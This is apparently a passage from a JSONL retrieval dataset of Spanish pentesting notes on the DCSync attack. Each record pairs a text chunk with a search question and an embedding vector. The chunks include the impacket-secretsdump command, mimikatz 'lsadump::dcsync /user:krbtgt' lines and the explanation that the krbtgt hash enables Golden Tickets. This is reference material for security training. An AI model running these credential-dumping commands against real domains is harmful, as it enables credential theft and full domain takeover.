-0.09257, -0.04627, 0.0684, 0.0327, -0.00942, -0.03112, -0.00608, -0.01077, 0.03044, -0.04365, 0.00079, 0.0094, 0.00352, 0.00052, -0.02801, -0.02449, -0.02453, 0.04967, -0.08425, -0.03291, 0.02396, 0.01552, 0.03875, -0.00992, 0.04422, -0.05169, 0.10194, 0.03717, -0.00098, -0.02724, 0.0543, -0.03033, 0.00251, -0.09277, -0.00702, -0.01745, 0.06286, -0.0038, -0.03512, -0.04604, -0.02215, -0.05068, -0.00755, -0.01021, 0.01681, -0.00117, -0.01082, 0.02961, -0.03096, 0.0671, 0.02184, -0.04202, 0.06745, -0.05698, 0.01979, -0.00584, 0.04416, -0.02757, -0.01558, 0.01185, -0.05364, 0.03388, 0.05522, 0.05615, -0.00457, 0.04753, -0.04594, 0.04734, 0.03818, -0.01611, 0.07074, 0.02224, -0.0561, -0.06866, 0.0214, 0.05653, -0.01695, -0.00996, 0.02668, 0.03616, 0.07099, 0.02949, 0.02652, 0.0159, -0.01132, -0.02523, 0.0326, 0.04006, 0.01878, -0.03136, -0.01673, 0.02137, 0.00697, -0.07787, 0.05047, -0.01898, -0.0803, -0.04022, 0.00368, 0.05066, 0.00444, -0.00902, -0.02838, -0.02368, -0.05402, 0.01498, -0.03704, -0.05523, -0.06851, -0.01024, 0.04773, -0.04396, 0.02505, -0.0197]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se llega\n- Un usuario con esos derechos (te lo dice BloodHound: arista `DCSync` / `GetChangesAll`).\n- O un ACL abuses que te conceda esos derechos.", "indexar": "cΓ³mo sΓ© si una mΓ‘quina estΓ‘ configurada para permitir el cambio total del catΓ‘logo?", "v": [-0.04494, 0.07232, -0.2104, -0.12736, -0.00479, -0.16359, 0.04715, 0.03948, -0.16405, -0.14824, -0.22981, -0.06306, -0.04949, -0.15658, 0.03463, -0.00929, 0.03475, -0.09916, 0.06071, 0.03575, 0.03465, -0.09085, 0.05413, -0.08731, 0.01149, 0.06191, 0.1389, -0.05989, -0.26698, 0.01253, -0.02695, -0.05098, 0.08949, -0.02736, 0.06159, -0.02173, 0.05152, 0.05859, 0.04546, -0.06736, 0.03082, -0.05571, 0.03094, 0.01332, 0.08173, -0.05354, 0.00582, -0.02594, 0.01614, 0.06307, -0.01029, -0.00275, -0.00509, 0.10083, 0.07944, -0.1173, 0.12743, 0.00546, 0.13838, -0.12032, 0.04919, 0.09127, -0.08007, 0.09207, -0.05186, -0.00597, -0.18693, 0.03074, 0.03916, 0.06074, -0.00783, -0.13451, -0.08443, -0.06173, 0.05787, 0.00609, 0.03274, -0.01538, 0.11988, -0.03289, 0.0382, -0.05246, -0.07214, -0.02865, 0.0099, 0.04696, 0.06345, -0.01555, 0.0836, -0.10692, 0.02615, -0.03146, 0.05509, 0.00267, 0.13095, -0.03187, -0.004, 0.03193, -0.01103, -0.02775, 0.03484, 0.08268, -0.10161, 0.12338, -0.05844, 0.0927, 0.07224, -0.04804, -0.0502, -0.10092, -0.00018, 0.06599, 0.03738, -0.0107, -0.00471, -0.01204, 0.06689, 0.09288, -0.01518, 0.01853, -0.07577, 0.03656, 0.01753, -0.04473, 0.03195, 0.038, 0.01581, 0.02238, 0.00693, 0.00438, -0.01375, 0.01916, -0.01805, -0.04339, -0.0798, 0.03148, -0.04947, 0.00448, -0.00952, -0.09349, -0.02408, 0.07704, -0.00224, -0.0293, 0.0705, -0.06022, 0.05578, -0.05253, -0.06141, 0.04442, 0.0489, 0.01504, 0.0717, 0.04614, -0.05051, 0.07948, -0.10759, -0.07869, -0.01303, -0.01127, -0.0365, -0.03162, 0.00811, 0.0052, 0.02841, 0.04146, -0.0448, 0.014, 0.08639, -0.057, -0.01118, 0.00688, 0.01658, -0.00828, 0.02894, 0.04217, -0.01794, -0.01536, 0.05727, 0.06142, -0.04312, -0.0103, -0.0404, -0.04241, -0.01926, -0.06162, 0.01027, 0.00082, 0.00657, -0.02669, 0.0232, 0.05055, -0.03488, 0.01744, 0.06085, 0.0156, -0.04873, 0.0438, 0.01212, 0.00813, -0.01069, -0.028, -0.05737, -0.04818, -0.00576, 0.00953, -0.04115, -0.06245, -0.03525, -0.04792, 0.07494, -0.06733, 0.00988, -0.03297, -0.10089, -0.018, -0.01767, 0.0113, 0.02642, -0.0482, 0.06747, -0.03141, 0.04109, -0.01633, -0.03511, -0.00774, 0.02402, -0.01416, 0.08955, 0.02213, 0.01642, -0.01595, -0.02767, -0.04068, 0.00753, -0.00613, 0.0487, 0.00819, -0.07525, -0.03573, 0.03139, 0.03031, 0.02102, -0.01324, -0.01834, -0.03177, -0.05773, -0.03481, -0.02207, -0.02744, -0.02334, 0.0398, -0.00035, -0.07353, -0.02844, -0.00671]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP # β†’ ver secretsdump\n```\n```", "indexar": "que herramienta puedo usar para descargar credenciales de un dominio con una contraseΓ±a?", "v": [-0.05825, 0.05967, -0.17491, -0.2079, 0.00654, -0.03056, -0.03815, -0.02076, -0.09145, -0.06691, -0.05992, -0.02894, -0.10523, -0.17229, -0.02511, 0.00801, 0.17148, -0.00684, 0.00043, -0.0031, 0.02264, -0.10425, -0.1019, -0.04584, -0.02305, -0.02109, 0.02183, -0.04911, -0.10402, 0.0284, 0.02294, -0.00852, 0.03304, 0.00976, -0.07262, 0.02861, -0.04624, 0.09756, 0.09751, 0.14362, 0.07716, 0.04842, -0.12624, 0.15223, -0.04686, 0.04674, -0.01232, -0.01401, 0.00338, -0.02412, -0.05808, -0.20321, -0.10986, -0.07183, 0.00615, -0.1457, 0.21914, -0.12547, 0.01007, -0.09644, -0.14371, 0.01818, 0.01244, 0.09146, -0.11566, -0.11917, 0.01728, -7e-05, -0.13803, 0.07145, 0.03087, -0.00545, -0.00487, 0.03635, 0.02316, -0.03115, 0.05002, -0.03559, 0.08431, 0.02445, 0.03569, -0.05767, 0.00922, -0.03509, -0.12635, -0.10605, 0.02104, -0.07172, 0.09405, -0.04367, 0.05162, 0.03363, -0.05923, -0.02625, -0.03133, -0.05699, -0.00709, -0.03715, -0.06085, -0.04484, 0.09202, 0.03358, -0.00316, 0.12203, 0.04453, 0.00575, -0.02056, -0.03693, -0.02104, -0.05222, 0.02779, -0.0098, -0.0495, -0.03299, -0.04032, 0.06919, -0.05318, -0.09289, 0.00598, -0.05614, -0.00943, -0.07321, -0.00556, -0.03306, 0.05058, 0.01747, -0.04921, 0.04294, -0.10702, -0.15748, -0.01578, -0.06119, -0.08281, 0.03427, -0.01481, 0.02043, 0.00614, -0.13276, -0.11132, -0.02906, 0.00497, -0.00955, -0.06593, -0.09326, 0.02743, 0.0183, 0.01434, -0.09813, -0.02891, -0.04195, 0.01641, 0.0016, 0.00419, 0.01257, -0.01391, 0.05353, 0.00226, -0.01579, -0.02289, 0.04747, -0.07261, -0.06557, 0.01912, 0.04424, -0.06099, -0.08448, 0.05453, 0.01939, 0.02285, 0.09445, 0.03719, 0.07198, 0.0217, -0.03329, 0.0131, -0.05301, -0.01095, -0.03207, -0.04083, -0.09481, -0.01842, -0.05041, -0.01041, 0.00605, -0.00248, -0.00172, 0.04983, 0.00093, -0.04621, 0.0295, 0.01726, 0.06109, 0.00167, 0.03612, 0.03077, -0.00195, -0.00125, -0.04167, -0.01151, -0.03766, -0.06147, -0.03484, -0.0429, -0.05064, 0.07595, 0.00493, -0.04075, -0.02423, -0.00839, 0.00168, 0.01486, -0.04325, 0.03596, -0.07525, -0.04203, -0.03992, -0.02287, 0.05738, -0.06428, -0.07107, 0.01376, 0.0656, 0.04946, 0.02605, 0.01079, 0.00857, -0.01492, 0.01667, 0.01017, 0.03051, -0.00481, 0.04235, -0.02337, -0.02433, 0.09039, -0.0307, 0.0025, -0.02197, -0.05383, -0.01593, -0.08123, 0.05753, 0.03995, -0.06315, -0.10985, -0.02426, -0.0432, 0.00421, 0.00292, -0.04108, -0.02718, 0.01367, 0.04998, -0.02152, -0.00503, 0.02392]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP # β†’ ver secretsdump\n```\n```", "indexar": "cual es el comando para realizar un dump de secretos en un servidor Windows?", "v": [0.05342, -0.03088, -0.13412, -0.13446, -0.05671, -0.0998, -0.04354, -0.04275, 0.01351, -0.04009, -0.05586, -0.10472, 0.00889, -0.18788, -0.07216, 0.01136, 0.17755, -0.02819, 0.02292, 0.008, 0.06581, -0.01592, 0.05933, 0.03392, -0.04554, 0.00398, 0.07729, 0.03503, -0.16467, -0.09635, 0.01569, -0.01893, -0.01148, -0.07945, 0.02786, 0.04938, 0.00625, 0.10503, -0.03096, 0.19858, 0.04993, 0.04453, -0.13353, 0.10829, -0.01545, -0.06314, 0.11073, -0.10096, 0.15596, -0.05374, -0.07153, -0.04048, -0.07684, -0.07098, -0.00588, -0.02842, 0.10833, -0.12424, 0.09294, 0.03594, -0.09165, 0.00315, -0.03237, 0.09349, 0.03764, -0.00668, -0.0387, -0.09017, -0.00795, 0.02434, -0.06864, 0.07337, 0.04805, 0.01609, 0.03107, -0.00186, -0.03929, -0.01591, 0.0976, 0.02411, 0.02449, 0.11187, -0.06104, 0.07442, -0.08397, -0.21112, -0.06884, -0.06678, 0.00732, -0.07016, 0.05442, -0.01378, -0.09146, 0.14773, 0.05838, -0.02501, 0.09558, 0.01954, -0.01866, 0.0552, 0.03546, -0.03984, -0.10056, 0.19487, 0.01164, 0.1615, 0.04872, -0.07823, -0.00107, -0.0101, 0.03899, 0.00216, -0.00045, 0.05799, -0.0582, -0.09822, 0.00917, -0.04863, 0.00739, 0.04045, -0.19282, 0.02155, -0.02749, 0.10701, 0.04042, -0.09571, 0.01471, 0.02105, 0.04209, 0.02212, -0.01206, 0.02587, -0.00607, -0.02512, -0.03693, 0.08361, 0.06486, -0.03856, -0.05248, -0.10741, 0.05517, 0.02569, 0.00424, 0.04408, 0.09783, -0.01744, 0.13901, -0.05148, -0.02363, -0.01553, 0.055, -0.01319, -0.08357, 0.00566, -0.02037, -0.03281, -0.02743, -0.01474, -0.04328, 0.01835, -0.0154, 0.01402, -0.06406, 0.00032, 0.02163, -0.05964, -0.02047, 0.04197, -0.00103, -0.01674, -0.01851, -0.01233, -0.0287, -0.05047, 0.01372, -0.00797, 0.00983, -0.0487, 0.00115, 0.02766, -0.01861, 0.04978, 0.00102, 0.01653, -0.07341, -0.03013, -0.03722, 0.01351, -0.04216, 0.00017, -0.02211, -0.02471, -0.00232, -0.03475, 0.01733, -0.03274, 0.00684, -0.05252, 0.00662, -0.03193, -0.01685, 0.02808, -0.03027, -0.06684, 0.0058, -0.04279, -0.04305, 0.01907, 0.03701, -0.00149, 0.03171, -0.01818, 0.03789, -0.07193, -0.04152, -0.06446, 0.0269, -0.03891, -0.02944, -0.00533, -0.00772, -0.01705, 0.08608, -0.05966, 0.00193, 0.01011, -0.02604, 0.01016, 0.07728, 0.00611, -0.05009, 0.0446, -0.01435, 0.00067, 0.03044, 0.01541, 0.00754, -0.01948, -0.02338, -0.08439, -0.03992, 0.06686, -0.02437, -0.13889, -0.03171, -0.08807, -0.04683, 0.02005, -0.02938, -0.07053, 0.01696, -0.02412, -0.01017, -0.01609, -0.02186, -0.02431]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o desde mimikatz en una mΓ‘quina del dominio:\nlsadump::dcsync /user:Administrator\nlsadump::dcsync /user:krbtgt # ← el premio gordo\n```", "indexar": "que herramienta sirve para robar contraseΓ±as de la cuenta KRBTGT?", "v": [0.07688, -0.13191, -0.10234, -0.17722, 0.03271, -0.19416, 0.03606, 0.09821, 0.03037, -0.05736, -0.07977, -0.11166, 0.1466, -0.04772, 0.1417, 0.06592, -0.13507, 0.00154, -0.06204, 0.05533, 0.01697, -0.05288, 0.10247, 0.02333, -0.05713, -0.02552, 0.03826, 0.05509, -0.12551, 0.17965, 0.01064, -0.02832, -0.01246, -0.00307, -0.09578, -0.0666, 0.02544, 0.07924, 0.03935, 0.10521, 0.15594, 0.03504, -0.08206, 0.1444, 0.08649, 0.01431, -0.0252, 0.01756, 0.0502, 0.12207, -0.055, -0.12407, -0.09306, -0.04233, -0.04606, -0.11614, 0.14033, -0.04808, -0.01982, -0.05741, -0.10341, -0.0131, -0.05248, -0.01098, -0.07143, -0.11752, 0.09392, -0.01558, -0.08067, 0.07799, -0.10623, -0.00352, -0.02523, 0.07681, -0.00264, 0.01285, 0.03385, 0.04927, 0.02891, 0.07763, -0.07342, -0.0243, -0.0775, 0.01937, -0.14024, -0.0562, 0.18556, -0.00364, 0.06187, -0.0901, -0.01802, 0.06682, 0.00472, -0.00348, -0.00921, -0.0698, 0.0455, -0.02234, -0.07467, -0.02813, 0.07549, -0.05718, -0.0773, 0.09129, -0.08373, 0.01551, -0.03873, -0.01233, 0.03756, -0.10924, 0.0326, -0.00978, -0.00922, 0.01915, 0.00421, 0.06366, -0.03136, -0.08478, -0.00522, -0.00979, 0.03241, -0.03202, -0.01036, -0.01355, 0.01972, -0.00481, 0.0217, 0.05782, -0.04118, -0.11505, 0.01188, 0.01363, -0.04743, 0.02794, -0.02939, 0.02337, 0.00156, -0.16182, -0.12571, -0.02704, -0.0351, 0.04929, -0.02071, -0.05127, 0.04563, 0.06324, 0.09034, -0.00469, 0.00594, -0.00711, 0.02843, -0.05057, -0.04132, -0.00995, -0.01376, 0.0484, -0.06043, -0.06099, -0.12434, 0.08067, -0.00871, -0.05357, -0.01003, 0.00698, -0.06054, -0.08417, 0.0726, 0.04635, 0.09332, 0.00023, 0.05504, 0.06922, 0.094, -0.02517, -0.02997, -0.0657, 0.00668, -0.03225, 0.00918, -0.09996, -0.05685, -0.00878, 0.00157, -0.01217, 0.01777, -0.04614, 0.06832, -0.01929, -0.01588, -0.03032, 0.00695, 0.0006, -0.06398, 0.02146, -0.01755, -0.00612, -0.01164, -0.04472, 0.02518, -0.02229, -0.00334, 0.01083, -0.04984, -0.06525, 0.06559, 0.02101, -0.04669, -0.02882, -0.07032, 0.00205, 0.07002, 0.00734, -0.00479, -0.08015, -0.01277, -0.06754, -0.04697, 0.02177, -0.04795, -0.02718, 0.02598, 0.0125, 0.04224, 0.02538, -0.01045, 0.02979, -0.0221, -0.01789, 0.01155, -0.03329, 0.00212, 0.00896, -0.05614, -0.03388, 0.05401, -0.02732, -0.01312, -0.02032, 0.00462, -0.06224, -0.05027, 0.04295, -0.00041, -0.07107, -0.05766, -0.0276, -0.0123, -0.0028, 0.00396, -0.05959, 0.00519, 0.01813, 0.0055, 0.00785, -0.01439, -0.05256]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o desde mimikatz en una mΓ‘quina del dominio:\nlsadump::dcsync /user:Administrator\nlsadump::dcsync /user:krbtgt # ← el premio gordo\n```", "indexar": "cual es un programa para extraer credenciales desde un dominio?", "v": [-0.07916, -0.01367, -0.01499, -0.00928, 0.06508, -0.04004, 0.1555, -0.04288, -0.21084, -0.09294, -0.05262, -0.02944, -0.10609, -0.27842, -0.02464, -0.02221, 0.22486, -0.0148, 0.07627, -0.01652, -0.06947, -0.06028, -0.01803, -0.08327, -0.00079, -0.03648, -0.09588, -0.02728, 0.05719, 0.16497, 0.06253, -0.0037, 0.03787, -0.05286, 0.05548, 0.01171, 0.03713, 0.10109, 0.05068, 0.11615, 0.03852, -0.04505, -0.0539, 0.01497, -0.03663, 0.00369, 0.04916, 0.01733, 0.00946, -0.19365, -0.00318, -0.02617, -0.03035, -0.06044, 0.10693, -0.05215, 0.01743, -0.17022, -0.05087, -0.033, 0.00064, -0.02313, 0.01981, -0.03126, -0.06122, -0.11177, 0.01883, -0.01076, -0.10024, 0.02829, -0.02527, -0.02573, 0.12323, 0.01688, 0.00864, -0.08635, 0.03568, -0.07919, 0.08691, -0.1102, 0.04787, -0.02787, 0.03347, 0.01793, -0.0759, -0.05042, -0.04612, -0.12027, -0.05116, 0.07516, 0.07388, 0.06683, -0.06325, 0.03145, -0.01457, -0.07151, 0.12352, 0.01291, -0.05437, 0.01988, 0.06939, 0.00229, -0.12811, 0.18527, 0.03869, 0.1259, 0.06302, -0.00132, -0.08312, 0.05534, -0.01774, -0.02283, -0.07792, -0.02458, -0.11626, 0.0726, -0.09189, 0.01942, 0.05135, -0.08881, -0.09085, -0.08093, 0.01988, -0.00108, 0.06658, 0.00505, -0.0588, 0.01563, -0.08688, -0.1044, -0.00153, 0.02753, 0.02146, -0.02388, -0.00846, -0.03543, 0.06342, -0.02986, -0.05828, -0.01204, 0.02242, -0.02593, -0.02173, 0.02559, -0.00637, -0.05094, 0.01453, -0.10203, 0.0265, -0.03221, -0.05005, 0.08857, -0.00749, 0.06155, -0.02989, 0.03179, -0.03071, 0.01274, -0.05438, 0.03413, -0.06892, -0.05751, 0.02397, -0.05828, 0.07724, -0.03884, -0.00889, -0.00011, 0.02056, 0.10245, -0.02273, 0.05417, 0.01202, -0.02478, 0.00537, 0.03442, 0.03935, -0.10394, 0.02362, -0.04062, -0.07014, 0.00181, 0.07043, 0.06765, -0.0419, 0.0334, 0.00692, 0.04534, -0.06589, 0.00444, 0.0311, 0.01322, -0.05331, 0.00203, -0.00328, -0.00713, 0.01985, -0.03643, 0.01938, -0.00992, -0.09186, -0.01761, 0.02113, -0.00292, -0.0159, 0.07923, 0.02642, -0.05641, 0.02254, 0.0827, -0.02378, -0.01816, 0.01558, -0.02413, -0.08265, 0.01541, -0.04899, 0.02959, -0.00618, -0.0455, -0.04285, -0.00584, 0.03781, 0.02449, -0.00907, -0.05709, 0.02363, 0.05282, -0.00372, 0.03077, -0.009, -0.03892, 0.00799, -0.02136, 0.01494, 0.01895, 0.03597, 0.00044, 0.01173, -0.07217, -0.08279, 0.0363, 0.02126, -0.07252, -0.06956, 0.02092, -0.07226, 0.06778, 0.00591, -0.00228, 0.01317, 0.02994, 0.02518, -0.02306, 0.04654, 0.05063]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o desde mimikatz en una mΓ‘quina del dominio:\nlsadump::dcsync /user:Administrator\nlsadump::dcsync /user:krbtgt # ← el premio gordo\n```", "indexar": "con que puedo ejecutar lsadump::dcsync en una maquina del dominio?", "v": [0.12894, -0.09914, -0.0204, -0.00248, -0.13579, -0.02469, -0.07095, 0.1087, -0.17996, 0.08909, -0.01092, -0.09021, -0.04256, -0.35643, -0.17585, -0.02439, 0.14204, 0.0133, -0.05622, -0.07612, 0.00759, -0.16581, -0.11049, 0.00788, 0.09983, 0.01261, -0.01335, 0.01465, -0.11977, 0.03954, 0.04469, 0.04224, -0.03686, -0.00052, 0.04176, -0.09252, -0.05834, 0.06393, 0.12966, 0.18014, 0.0082, 0.06577, -0.18992, -0.04757, -0.06509, -0.06127, 0.04594, -0.09567, 0.00467, -0.20178, -0.04874, -0.01252, -0.11772, -0.08031, -0.01236, 0.02124, 0.00796, -0.05277, 0.09804, -0.04172, 0.00503, 0.00055, -0.05792, 0.02853, -0.0392, -0.07411, -0.00194, -0.00669, 0.05091, 0.05603, -0.07757, -0.05884, 0.09797, -0.03125, 0.07364, -0.13404, 0.03878, 0.01817, 0.11517, 0.04342, -0.01463, -0.04215, -0.06435, 0.00915, -0.05884, -0.0989, -0.11593, -0.07784, 0.06758, -0.02384, 0.06806, 0.06716, -0.04558, 0.01387, -0.00743, -0.00843, 0.10143, -0.03577, -0.02226, -0.05609, 0.12341, 0.08321, -0.04691, 0.00852, 0.0138, 0.03914, 0.06469, 0.04032, 0.01748, 0.02791, 0.05893, 0.02562, -0.06457, -0.02019, -0.10377, -0.01653, -0.09078, -0.01075, 0.0076, -0.02509, -0.08755, 0.03142, 0.00222, -0.05393, -0.02306, 0.01436, 0.03177, 0.00653, -0.06316, -0.06587, 0.00233, -0.0238, 0.03663, -0.07001, -0.00664, 0.07251, 0.02399, -0.06711, -0.01292, -0.05098, 0.03437, -0.02072, -0.08855, 0.00885, 0.01372, -0.02097, 0.06821, -0.13868, -0.00546, -0.05168, 0.06273, -0.00767, -0.05355, 0.0446, 0.01236, 0.06459, -0.02103, 0.02256, 0.01862, 0.05071, -0.04227, 0.08583, -0.07158, -0.0341, 0.00726, 0.00945, 0.00672, -0.00393, -0.05544, 0.06022, -0.00096, -0.00176, 0.07463, -0.01449, 0.01947, -0.02012, -0.03236, -0.02096, 0.02857, 0.03441, 0.0085, -0.00113, -0.00376, 0.04446, -0.00711, 0.07125, -0.00854, -0.01841, -0.04179, 0.03696, 0.02495, -0.01171, 0.00048, -0.02604, 0.07004, 0.00105, 0.00529, 0.05106, -0.06364, -0.01257, 0.00647, -0.01806, 0.05988, 0.04197, -0.0348, 0.00297, 0.00466, 0.00723, -0.02863, -0.03862, 0.04105, 0.01397, 0.01515, -0.04609, -0.05558, 0.01596, -0.07749, 0.02655, -0.0374, -0.04942, -0.01129, 0.01672, 0.01202, 0.0042, 0.02652, 0.00485, -0.02552, -0.00463, 0.04185, 0.01053, -0.05239, -0.00058, -0.00229, -0.00802, 0.05399, -0.02835, 0.02035, -0.04194, 0.01725, -0.00437, -0.0035, -0.0208, 0.05662, -0.03009, -0.02112, -0.0082, -0.02499, -0.0304, -0.04391, 0.03961, 0.01705, 0.00805, -0.0205, 0.02343, -0.05045, 0.06352]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\nEl hash de **krbtgt** β†’ Golden Ticket = control total y persistente del dominio.\n\nRelacionado: Mimikatz Β· Impacket Β· Active Directory Β· OSCP MOC", "indexar": "que herramienta sirve para generar un Golden Ticket?", "v": [-0.08245, -0.0499, -0.08515, -0.14887, -0.03212, -0.04612, -0.12347, 0.00587, 0.09617, -0.08186, -0.05837, 0.0225, -0.04718, 0.02597, 0.0691, 0.0701, 0.04997, -0.16707, 0.02763, 0.07619, -0.00187, 0.14175, 0.05383, -0.24984, -0.01889, -0.05835, 0.10922, -0.0642, -0.12453, 0.12844, 0.10903, -0.11633, -0.08368, -0.19419, -0.1296, -0.15036, -0.0253, 0.11198, -0.01812, -0.00098, 0.00467, 0.05554, -0.01321, 0.0568, 0.06922, -0.0243, 0.05077, 0.11331, -0.09596, 0.08451, -0.02019, -0.10813, -0.07763, -0.02331, 0.01909, -0.09372, 0.05965, -0.16381, -0.0827, -0.03712, -0.11128, -0.11852, -0.06552, -0.01937, -0.10984, 0.10653, 0.01518, -0.00983, -0.00505, 0.0081, -0.09113, 0.05451, 0.08077, 0.04423, 0.05156, -0.05132, 0.06359, 0.0503, -0.00927, 0.06305, 0.09245, 0.00545, -0.03658, 0.02384, 0.02462, -0.06379, 0.12982, -0.06236, -0.02981, -0.05034, -0.08617, 0.03087, 0.05625, 0.00764, 0.00521, -0.06988, -0.009, -0.10621, -0.04303, 0.04669, 0.14857, -0.11039, -0.03948, 0.01457, -0.03002, 0.0592, -0.00059, -0.04294, -0.08777, 0.00663, -0.02843, 0.04588, -0.04317, 0.01487, -0.00169, 0.07888, 0.05503, -0.03025, 0.06288, -0.03271, 0.11163, 0.01404, -0.09947, -0.04826, -0.03226, 0.04128, -0.03611, 0.00125, 0.03791, -0.05161, -0.04435, 0.01366, -0.03361, 0.04283, -0.0209, -0.03403, 0.01588, -0.13509, 0.05085, 0.01717, 0.04777, 0.01496, -0.01173, -0.10094, 0.00876, -0.06016, 0.01705, -0.02361, -0.01387, -0.02101, 0.01774, -0.10943, -0.04491, 0.08314, -0.0948, 0.02352, -0.05468, 0.00963, -0.10738, 0.02539, -0.05581, -0.02306, 0.01029, 0.02532, 0.0065, 0.00507, -0.02201, 0.03659, 0.02954, 0.06128, 0.06088, -0.00815, 0.09052, -0.02546, -0.03495, -0.07513, -0.07164, -0.02786, 0.03696, -0.07712, 0.06006, -0.0291, -0.04982, 0.02561, -0.03281, -0.01253, 0.03279, -0.04598, 0.03438, 0.05062, -0.02559, 0.01022, 0.03812, -0.0209, 0.01812, -0.05446, -0.00744, -0.07198, 0.05326, -0.04776, -0.02586, -0.0053, -0.03102, 0.01546, 0.0851, 0.04878, -0.0163, -0.02336, -0.01444, 0.07297, 0.01016, -0.00228, 0.07104, -0.02848, 0.0135, -0.03992, 0.01172, 0.00615, -0.03571, 0.00071, 0.07575, -0.01443, 0.02725, -0.01391, -0.00881, 0.03008, 0.02181, 0.00206, 0.0428, 0.00659, 0.06681, -0.01682, -0.01806, 0.05012, 0.0487, -0.04553, 0.05808, -0.0324, -0.07295, -0.00471, -0.00755, 0.04254, -0.00859, 0.02221, 0.00826, -0.02016, 0.02061, 0.00858, 0.02867, -0.0578, -0.03223, -0.00015, 0.03279, -0.03232, 0.00951, -0.01739]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\nEl hash de **krbtgt** β†’ Golden Ticket = control total y persistente del dominio.\n\nRelacionado: Mimikatz Β· Impacket Β· Active Directory Β· OSCP MOC", "indexar": "con que puedo obtener el control total de mi dominio activo?", "v": [-0.03909, 0.17096, -0.11257, -0.03244, -0.03034, 8e-05, 0.01401, 0.06035, -0.257, 0.03574, 0.01226, -0.14072, 0.05074, -0.13023, 0.06005, -0.05962, 0.16167, -0.07871, -0.08197, 0.01367, 0.03018, -0.12197, 0.04104, -0.00901, 0.12534, 0.01046, 0.00322, -0.01476, -0.01287, 0.10994, 0.04073, -0.02525, 0.05381, -0.01038, 0.07739, -0.06786, -0.00648, 0.15406, 0.15273, 0.1138, -0.0623, -0.05905, -0.093, 0.0221, 0.03361, 0.08615, -0.04972, -0.10362, -0.04199, -0.05936, -0.01593, -0.03261, -0.10116, -0.09015, -0.0044, -0.0094, 0.00717, -0.06931, 0.03995, -0.11883, -0.01489, -0.06147, 0.01864, 0.10937, -0.02044, -0.10756, 0.08289, 0.01002, -0.04331, 0.10996, 0.08433, -0.00562, 0.0003, 0.04315, 0.0745, -0.09656, 0.06965, -0.0694, 0.04436, -0.03861, -0.00164, -0.0359, -0.0644, -0.01586, -0.06957, -0.13089, -0.15741, -0.19909, 0.06846, 0.02104, 0.03591, 0.0168, -0.06999, -0.01305, -0.12874, 0.01572, -0.05679, 0.07097, -0.06339, -0.0195, 0.06479, 0.16038, -0.11421, 0.09572, 0.17931, 0.02915, 0.03449, -0.00901, -0.02765, 0.03591, -0.08931, -0.05039, -0.00694, -0.04223, -0.00351, 0.14765, -0.10028, 0.02003, 0.07312, -0.03187, -0.04465, 0.01601, 0.03534, 0.01731, 0.05167, -0.03914, 0.04414, -0.01744, -0.01705, -0.10148, 0.01453, 0.00283, 0.048, -0.13249, 0.00031, 0.01895, 0.00022, 0.07829, -0.04346, 0.01548, -0.06007, 0.03275, -0.02597, -0.0339, 0.02374, -0.12326, -0.00295, -0.03647, 0.0094, -0.01603, -0.08252, -0.00774, 0.0366, 0.03754, 0.01482, 0.05785, -0.01325, 0.01752, 0.05105, 0.03378, -0.03148, 0.00683, -0.08108, 0.04306, 0.04106, 0.00427, -0.03043, -0.03001, -0.04312, 0.0466, -0.09891, 0.04129, -0.01178, -0.04676, 0.00726, -0.01693, 0.01311, -0.04852, 0.00548, -0.05452, 0.00696, -0.03429, -0.00384, 0.04361, -0.002, 0.08177, 0.0391, -0.00034, -0.02461, 0.03432, 0.06063, 0.03989, -0.00918, 0.00869, 0.03225, 0.00877, 0.00238, 0.02109, 0.01996, -0.04634, 0.03715, -0.06, 0.02117, -0.00122, -0.03729, -0.03502, -0.00261, 0.0265, 0.04328, -0.04384, -0.00458, -0.00386, 0.06837, -0.04086, -0.05151, 0.00992, -0.02638, 0.00777, 0.01639, -0.09144, 0.01384, 0.03139, 0.00092, -0.00516, 0.04698, -0.04642, 0.01729, -0.00838, 0.03671, 0.09036, -0.04016, -0.02537, -0.01852, -0.02429, 0.05111, -0.00916, 0.06306, -0.00662, 0.00653, 0.04523, -0.03496, 0.00947, 0.06479, -0.02001, -0.08603, -0.04423, -0.03326, 0.02682, -0.06937, -0.0088, 0.01199, 0.00482, 0.00795, -0.01419, -0.02987, 0.02714]} +{"tipo": "pregunta", "herramienta": "Recursos pΓΊblicos", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Recursos pΓΊblicos.md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "# Recursos pΓΊblicos\n\n> DΓ³nde estΓ‘ SÍ todo esto (cultura pΓΊblica, nada bajo NDA). Apoyo para MetodologΓ­a OSCP y el Reporte OSCP.\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (Reddit) | MΓ‘quinas HTB/THM equivalentes a OSCP, actualizada |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista las mΓ‘quinas) |\n| **0xdf.gitlab.io** | Writeups 